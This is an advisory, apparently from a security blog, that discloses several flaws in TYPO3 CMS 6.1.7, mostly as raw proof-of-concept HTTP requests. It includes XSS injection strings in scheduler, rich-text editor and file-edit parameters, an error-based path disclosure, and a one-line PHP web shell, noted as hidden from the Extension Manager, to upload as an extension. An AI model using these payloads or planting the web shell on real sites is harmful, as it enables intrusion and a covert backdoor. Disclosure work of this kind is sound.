# ============================================================== # Title ...| Multiple vulnerabilities in Typo3 CMS # Version .| introductionpackage-6.1.7 # Date ....| 24.02.2014 # Found ...| HauntIT Blog # Home ....| www.typo3.org # ============================================================== From admin user: # ============================================================== # 1. XSS ---<request>--- POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_txschedulerM1&CMD=edit&tx_scheduler[uid]=1 HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 329 SET%5Bfunction%5D=scheduler&CMD=save&tx_scheduler%5Buid%5D=1&previousCMD=edit&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tx_scheduler%5Btype%5D=2&tx_scheduler%5Bstart%5D=00%3A00+01-10-2011&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=0+*+*+*+*&tx_scheduler%5Bmultiple%5D=0 ---<request>--- ---<response>--- Class</label></abbr></span></td><td class="td-input"> ()<input type="hidden" name="tx_scheduler[class]" id="task_class" value="'>"><body/onload=alert(9999)>" /> ---<response>--- # ============================================================== # 2. Shell upload possibility If admin is logged in he can add 'extension' in ZIP file. So there is a possibility to install webshell located in zipped PHP file. Backdoor will be available (like) here: ---<code>--- /home/k/public_html/cms/intro/introductionpackage-6.1.7/typo3conf/ext/mishell/mishell.php:1: <?php system($_REQUEST['cmd']);?> ---<code>--- The 'good news' (for user who hijacked admin's accout) is that the backdoor won't be visible from Extention Manager. # ============================================================== # 3. Information disclosure bug ---<request>--- POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_ExtensionmanagerExtensionmanager&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Baction%5D=extract&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bcontroller%5D=UploadExtensionFile&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bformat%5D=json HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 1986 -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@extension]" Extensionmanager -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@vendor]" TYPO3\CMS -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@controller]" UploadExtensionFile -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@action]" form -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][arguments]" YToyOntzOjY6ImFjdGlvbiI7czo0OiJmb3JtIjtzOjEwOiJjb250cm9sbGVyIjtzOjE5OiJVcGxvYWRFeHRlbnNpb25GaWxlIjt9190c41a301fed009dff796152c31d68de5be7721 -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__trustedProperties]" a:2:{s:13:"extensionFile";a:5:{s:4:"name";i:1;s:4:"type";i:1;s:8:"tmp_name";i:1;s:5:"error";i:1;s:4:"size";i:1;}s:9:"overwrite";i:1;}7b7da06281d8102e2c39d7a0d4d40655f5f5603c -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[extensionFile]"; filename="mishell.zip" Content-Type: application/zip blah... -----------------------------147561664023554 Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[overwrite]" '`"%3b--#%%2f%2a -----------------------------147561664023554-- ---<request>--- And then: ---<response>--- {"success":"true","extension":null,"error":"PHP Catchable Fatal Error: Argument 1 passed to TYPO3\\CMS\\Extensionmanager\\Utility\\InstallUtility::processDatabaseUpdates() must be of the type array, null given, called in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php on line 133 and defined in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php line 244"} ---<response>--- # ============================================================== # 4. DOM-based XSS ---<request>--- GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?&RTEtsConfigParams=';//</script><script>alert(132)</script>&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&contentTypo3Language=default HTTP/1.1 ---<request>--- ---<response>--- (...) '|data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_:0|';//</script><script>alert(132)</script>|'); } (...) ---<response>--- # ============================================================== # 5. DOM-based XSS ---<request>--- GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?act=plain&bparams=|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_:0|tx_news_domain_model_news:NEW530b1d080b773:bodytext:0:0:0:|&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&RTEtsConfigParams=tx_news_domain_model_news%3ANEW530b1d080b773%3Abodytext%3A0%3A0%3A0%3A HTTP/1.1 ---<request>--- ---<response>--- (...) var plugin = window.parent.RTEarea["data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_"].editor.getPlugin("TYPO3Image"); var HTMLArea = window.parent.HTMLArea; HTMLArea.TYPO3Image.insertElement = function (table, uid, type, filename, filePath, fileExt, fileIcon) { return jumpToUrl('?editorNo=' + 'data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_' + '&insertImage=' + filePath + '&table=' + table + '&uid=' + uid + '&type=' + type + 'bparams=' + '|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodyte (...) ---<response>--- ==================================================================== [+] Now for "simple_editor" user: ==================================================================== # ============================================================== # 6. XSS ---<request>--- POST /k/cms/intro/introductionpackage-6.1.7/typo3/tce_file.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 349 file%5Beditfile%5D%5B0%5D%5Bdata%5D=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&target=1&file%5Beditfile%5D%5B0%5D%5Btarget%5D=180&redirect=%2Fk%2Fcms%2Fintro%2Fintroductionpackage-6.1.7%2Ftypo3%2Fmod.php%3F%26id%3D1%253A%252Fuser_upload%252Fdocuments%252Fasdasd%252F%26M%3Dfile_list%26SET%5BbigControlPanel%5D%3D1 ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/